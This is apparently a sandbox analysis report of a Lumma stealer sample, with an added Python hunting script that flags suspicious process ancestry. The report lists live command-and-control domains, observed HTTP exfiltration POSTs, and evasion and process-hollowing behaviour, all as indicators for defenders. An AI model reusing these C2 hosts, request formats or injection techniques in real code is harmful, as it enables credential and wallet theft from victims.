
Windows Analysis Report
NjFiIQNSid.exe

Overview

General Information

Sample name: NjFiIQNSid.exe (renamed because the original name is a hash value)
Original sample name: 49615905016fb4de6a3b50d12979b1076eca6bc539d9bcbf2ed338b6b2299cc7.exe
Analysis ID: 1585134
MD5: 29ca15934b67b18a91254ce253a588ca
SHA1: 05dfc5bb1df62ca212e1c8adf5af4542f7ad8b78
SHA256: 49615905016fb4de6a3b50d12979b1076eca6bc539d9bcbf2ed338b6b2299cc7
Tags: exe, user-zhuzhu0009

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • NjFiIQNSid.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\NjFiIQNSid.exe" MD5: 29CA15934B67B18A91254CE253A588CA)
    • BitLockerToGo.exe (PID: 6484 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration (extracted): {"C2 url": ["tirepublicerj.shop", "cloudewahsj.shop", "wholersorie.shop", "abruptyopsn.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop", "bootstringjl.click", "nearycrepso.shop"], "Build id": "HpOoIh--2a727a032c4d"}
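The process tree above is the detail a hunter wants to turn into a query: a sample started from the user's Desktop creates a Microsoft binary under C:\Windows\ (BitLockerToGo.exe) and, per the signatures listed earlier, writes a PE image into it. The following is an added example, not Joe Sandbox code, that applies that parent-path check to process-creation records and prints the ancestry chain of each hit. The records are constructed in a Sysmon-Event-1-like shape (pid, ppid, image); PIDs 6920 and 6484 and their images come from the report, while the explorer.exe ancestor, the other PIDs and the benign sibling launch are assumptions made for the example.

```python
r"""Process-tree hunt for the injection pattern in this report.

Added example, not Joe Sandbox code. Flags any process whose image lives under
C:\Windows\ but whose parent image lives in a user-writable directory, and reports
the parent chain. Event records are constructed; only PIDs 6920/6484 and their
image paths are taken from the report above.
"""

SYSTEM_ROOT = "c:\\windows\\"
# Markers of user-writable locations in a lower-cased path (assumption: tune per estate).
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
# Target used by this sample; other Lumma builds may pick a different host binary.
KNOWN_HOLLOW_TARGETS = {"bitlockertogo.exe"}


def basename(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1]


def is_system_image(image):
    return image.lower().startswith(SYSTEM_ROOT)


def is_user_writable(image):
    path = image.lower()
    return any(marker in path for marker in USER_WRITABLE)


def build_tree(events):
    """Map pid -> event; duplicate pids (PID reuse) are rejected rather than silently merged."""
    tree = {}
    for ev in events:
        if ev["pid"] in tree:
            raise ValueError(f"duplicate pid {ev['pid']}; split the log by process start time")
        tree[ev["pid"]] = ev
    return tree


def ancestry(tree, pid):
    """Image basenames from the process up through known ancestors; stops on unknown parent or cycle."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        chain.append(basename(tree[pid]["image"]))
        pid = tree[pid]["ppid"]
    return chain


def hunt(events):
    """One finding per process in a system directory whose parent image is user-writable."""
    tree = build_tree(events)
    findings = []
    for ev in events:
        parent = tree.get(ev["ppid"])
        if parent is None or not is_system_image(ev["image"]) or not is_user_writable(parent["image"]):
            continue
        findings.append({
            "pid": ev["pid"],
            "image": ev["image"],
            "parent_image": parent["image"],
            "known_hollow_target": basename(ev["image"]).lower() in KNOWN_HOLLOW_TARGETS,
            "chain": ancestry(tree, ev["pid"]),
        })
    return findings


# Constructed process-creation events; 6920 and 6484 mirror the report's process tree.
PROCESS_EVENTS = [
    {"pid": 4321, "ppid": 1000, "image": r"C:\Windows\explorer.exe"},
    {"pid": 6920, "ppid": 4321, "image": r"C:\Users\user\Desktop\NjFiIQNSid.exe"},
    {"pid": 6484, "ppid": 6920, "image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"},
    # Same image started by explorer.exe: not flagged, since the parent is not user-writable.
    {"pid": 7100, "ppid": 4321, "image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"},
]

if __name__ == "__main__":
    for f in hunt(PROCESS_EVENTS):
        print(f"pid {f['pid']}: {f['image']} spawned by {f['parent_image']}")
        print("   chain:", " <- ".join(f["chain"]))
        print("   known hollowing target:", f["known_hollow_target"])
```

A parent outside the system and program directories is a hunt lead, not proof of injection on its own; the corroborating evidence in this report is the suspended-mode creation and the foreign-memory writes, which live in API-call telemetry rather than in the process tree.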
Yara matches (Source | Rule | Description | Author):
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: BitLockerToGo.exe PID: 6484 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: BitLockerToGo.exe PID: 6484 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: BitLockerToGo.exe PID: 6484 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
                No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2025-01-07T06:01:53.949040+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.12 | 49714 | 104.102.49.254 | 443 | TCP
2025-01-07T06:01:55.095658+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.12 | 49715 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:56.178686+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.12 | 49716 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:57.515055+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.12 | 49717 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:58.799997+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.12 | 49718 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:00.041788+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.12 | 49719 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:02.028689+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.12 | 49720 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:03.345579+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.12 | 49721 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:04.676158+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.12 | 49722 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:55.679027+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.12 | 49715 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:56.656307+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.12 | 49716 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:05.172574+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.12 | 49722 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:55.679027+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.12 | 49715 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:56.656307+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.12 | 49716 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:53.201766+0100 | 2058598 | 1 | Domain Observed Used for C2 Detected | 192.168.2.12 | 61164 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.268439+0100 | 2058606 | 1 | Domain Observed Used for C2 Detected | 192.168.2.12 | 55305 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.224916+0100 | 2058610 | 1 | Domain Observed Used for C2 Detected | 192.168.2.12 | 59491 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.190389+0100 | 2058616 | 1 | Domain Observed Used for C2 Detected | 192.168.2.12 | 53987 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.245728+0100 | 2058618 | 1 | Domain Observed Used for C2 Detected | 192.168.2.12 | 52344 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.257267+0100 | 2058622 | 1 | Domain Observed Used for C2 Detected | 192.168.2.12 | 50381 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.235108+0100 | 2058628 | 1 | Domain Observed Used for C2 Detected | 192.168.2.12 | 60843 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.213434+0100 | 2058632 | 1 | Domain Observed Used for C2 Detected | 192.168.2.12 | 60382 | 1.1.1.1 | 53 | UDP
2025-01-07T06:02:04.152149+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49721 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:54.486321+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.12 | 49714 | 104.102.49.254 | 443 | TCP

                AV Detection

Source: NjFiIQNSid.exe | Avira: detected
Source: 4.2.BitLockerToGo.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "cloudewahsj.shop", "wholersorie.shop", "abruptyopsn.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop", "bootstringjl.click", "nearycrepso.shop"], "Build id": "HpOoIh--2a727a032c4d"}
Source: NjFiIQNSid.exe | Virustotal: Detection: 45%
Source: NjFiIQNSid.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: NjFiIQNSid.exe | Joe Sandbox ML: detected
Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor (decrypted strings):
  cloudewahsj.shop
  rabidcowse.shop
  noisycuttej.shop
  tirepublicerj.shop
  framekgirus.shop
  wholersorie.shop
  abruptyopsn.shop
  nearycrepso.shop
  bootstringjl.click
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  HpOoIh--2a727a032c4d
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00419362 CryptUnprotectData | 4_2_00419362
Source: NjFiIQNSid.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.12:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49722 version: TLS 1.2
Source: NjFiIQNSid.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code functions containing 4x nop followed by the listed instruction (function | instruction):
  4_2_00426000 | movzx ecx, byte ptr [esp+eax+217F4C11h]
  4_2_0040C22D | movzx ebx, byte ptr [eax+edx-143BF0FEh]
  4_2_00419362 | mov dword ptr [esp], ecx
  4_2_0043FB80 | cmp dword ptr [edx+ecx*8], 9164D103h
  4_2_0043DCE9 | movzx esi, byte ptr [esp+edx+2397B827h]
  4_2_0043DCE9 | cmp dword ptr [edi+esi*8], 385488F2h
  4_2_00440480 | cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah
  4_2_00408640 | mov esi, edx
  4_2_0042BE8A | mov byte ptr [edi], al
  4_2_0042BE8A | movzx eax, byte ptr [esp+ecx-1EBCBB22h]
  4_2_0042A050 | cmp byte ptr [esi+eax], 00000000h
  4_2_0043E051 | movzx ecx, byte ptr [esp+eax+129161F8h]
  4_2_0043E850 | movzx edx, byte ptr [ebx+eax-01h]
  4_2_0043D818 | jmp ecx
  4_2_00419820 | cmp dword ptr [esi+edx*8], 798ECF08h
  4_2_00419820 | cmp dword ptr [edi+esi*8], 385488F2h
  4_2_0043F830 | mov eax, dword ptr [ebp+10h]
  4_2_0043F0CB | mov eax, dword ptr [ebp+10h]
  4_2_0042C0CD | mov byte ptr [edi], dl
  4_2_00415882 | movzx edx, byte ptr [esp+eax+18h]
  4_2_00415882 | cmp dword ptr [esi+edx*8], 138629C0h
  4_2_004398A0 | cmp dword ptr [edi+ebp*8], 385488F2h
  4_2_004390A0 | cmp dword ptr [ebx+edi*8], 4B1BF3DAh
  4_2_0042C140 | mov byte ptr [edi], dl
  4_2_00416148 | cmp dword ptr [eax+ebx*8], 9EB5184Bh
  4_2_00416148 | movzx esi, byte ptr [esp+ecx+68h]
  4_2_00416148 | mov byte ptr [esi], al
  4_2_00416148 | mov byte ptr [esi], al
  4_2_0042895A | mov word ptr [edi], cx
  4_2_0042895A | mov ecx, eax
  4_2_00424974 | movzx esi, word ptr [eax]
  4_2_00424974 | cmp dword ptr [ebx+edi*8], 385488F2h
  4_2_00428100 | mov word ptr [eax], cx
  4_2_00440130 | cmp dword ptr [edx+ecx*8], E81D91D4h
  4_2_004229CD | jmp ecx
  4_2_004229CD | mov word ptr [eax], cx
  4_2_0043E19A | cmp dword ptr [edi+esi*8], 385488F2h
  4_2_0042C1A3 | mov byte ptr [edi], dl
  4_2_0043C1B0 | movzx ecx, byte ptr [esp+eax-27C0856Fh]
  4_2_0043F1B0 | mov eax, dword ptr [ebp+10h]
  4_2_00427A5A | mov word ptr [eax], cx
  4_2_0041CA60 | mov word ptr [edi], ax
  4_2_0041CA60 | mov word ptr [edi], ax
  4_2_0043E262 | movzx edx, byte ptr [esp+ecx-19559D57h]
  4_2_00423A60 | movzx ecx, byte ptr [esp+eax+000011E4h]
  4_2_0042C26C | mov byte ptr [edi], al
  4_2_0042C26C | movzx eax, byte ptr [esp+ecx-1EBCBB22h]
  4_2_0042BA79 | mov byte ptr [esi], al
  4_2_0043F2F6 | mov eax, dword ptr [ebp+10h]
  4_2_0042C282 | mov byte ptr [edi], al
  4_2_0042C282 | movzx eax, byte ptr [esp+ecx-1EBCBB22h]
  4_2_0043EA80 | movzx edx, byte ptr [esp+ecx-22E2F54Ah]
  4_2_00429A90 | mov ebx, dword ptr [edi+04h]
  4_2_00426340 | mov word ptr [eax], cx
  4_2_00426340 | movzx edx, byte ptr [esp+ecx+217F4C99h]
  4_2_00402B60 | movzx edi, byte ptr [ecx+esi]
  4_2_00426360 | movzx esi, byte ptr [esp+eax-00000092h]
  4_2_00426360 | mov word ptr [eax], cx
  4_2_00427B08 | mov word ptr [eax], cx
  4_2_0043F330 | mov eax, dword ptr [ebp+10h]
  4_2_004073C0 | add eax, dword ptr [esp+ecx*4+20h]
  4_2_004073C0 | movzx ecx, word ptr [ebp+edi*4+00h]
  4_2_0043F3C0 | mov eax, dword ptr [ebp+10h]
  4_2_0041C3CC | movzx edx, byte ptr [ebx+ecx-5Fh]
  4_2_00420BD3 | push esi
  4_2_004393D0 | test eax, eax
  4_2_0042238D | mov byte ptr [eax], dl
  4_2_0042238D | jmp ecx
  4_2_0043C440 | mov edx, eax
  4_2_0043F450 | mov eax, dword ptr [ebp+10h]
  4_2_00439C70 | movzx ebx, byte ptr [esp+edi-4Bh]
  4_2_00435410 | movzx ebx, byte ptr [edx]
  4_2_00421C80 | movzx esi, byte ptr [esp+ecx+02h]
  4_2_00416C90 | movzx ebx, byte ptr [esp+ecx+5BA4F399h]
  4_2_004274A5 | cmp byte ptr [esi+eax], 00000000h
  4_2_00427CB0 | movzx eax, byte ptr [ebp+ecx-000000DCh]
  4_2_00427CB0 | mov word ptr [eax], cx
  4_2_0043C510 | mov esi, ecx
  4_2_0043C510 | test eax, eax
  4_2_0043C510 | cmp dword ptr [esi+edx*8], 06702B10h
  4_2_00414DC0 | movzx ebx, byte ptr [esp+eax+5024FCA5h]
  4_2_00416C90 | movzx ebx, byte ptr [esp+ecx+5BA4F399h]
  4_2_004155DB | movzx edx, byte ptr [esp+eax+18h]
  4_2_0041AD80 | mov ecx, eax
  4_2_0043FE20 | cmp dword ptr [edx+ecx*8], 2DFE5A91h
  4_2_0041CECA | mov word ptr [ecx], bp
  4_2_0043E6E0 | movzx ebx, byte ptr [esp+ecx]
  4_2_0040C6F0 | movzx ebx, byte ptr [esp+ecx+000000C8h]
  4_2_00408EF0 | mov byte ptr [edi], bl
  4_2_0041DE90 | mov byte ptr [ebp+00h], al
  4_2_00418740 | mov word ptr [ebx], cx
  4_2_00414777 | mov word ptr [edi], dx
  4_2_0041BFCA | mov byte ptr [esi], al
  4_2_004237D0 | movzx edx, byte ptr [esp+ecx+20h]
  4_2_00417FE1 | movzx ecx, byte ptr [esp+eax+5F376B7Fh]
  4_2_00417FE1 | movzx edi, byte ptr [esp+eax+000002E8h]
  4_2_00416F8D | mov byte ptr [esi], al
  4_2_00416F8D | mov edx, ecx
  4_2_00416F8D | mov word ptr [esi], cx
  4_2_00424F91 | mov eax, dword ptr [esp+20h]
  4_2_00424F91 | cmp dword ptr [ebx+edi*8], 385488F2h
  4_2_0043DFB3 | movzx esi, byte ptr [esp+eax]

                Networking

Source: Network traffic | Suricata IDS: 2058632 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) : 192.168.2.12:60382 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.12:60843 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058618 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) : 192.168.2.12:52344 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.12:53987 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.12:61164 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058622 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) : 192.168.2.12:50381 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.12:55305 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058610 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) : 192.168.2.12:59491 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49722 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.12:49716 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49716 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.12:49721 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.12:49715 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.12:49714 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49715 -> 104.21.112.1:443
Source: Malware configuration extractor | URLs: tirepublicerj.shop, cloudewahsj.shop, wholersorie.shop, abruptyopsn.shop, framekgirus.shop, noisycuttej.shop, rabidcowse.shop, bootstringjl.click, nearycrepso.shop
Source: Joe Sandbox View | IP Address: 104.21.112.1
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49714 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49715 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49718 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49720 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49716 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49719 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49721 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49722 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49717 -> 104.21.112.1:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U8EC1VY5VE892AI389User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12844Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NR6WZU599JG4CJFS1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15073Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L84VY24J9K91LVK0AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20248Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IWA9NYINFDTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1184Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=31SWZHMOWET50R8LPRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1123Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ ht | equals www.youtube.com (Youtube)
                Source: BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ttps://www.youtube.com hC | equals www.youtube.com (Youtube)
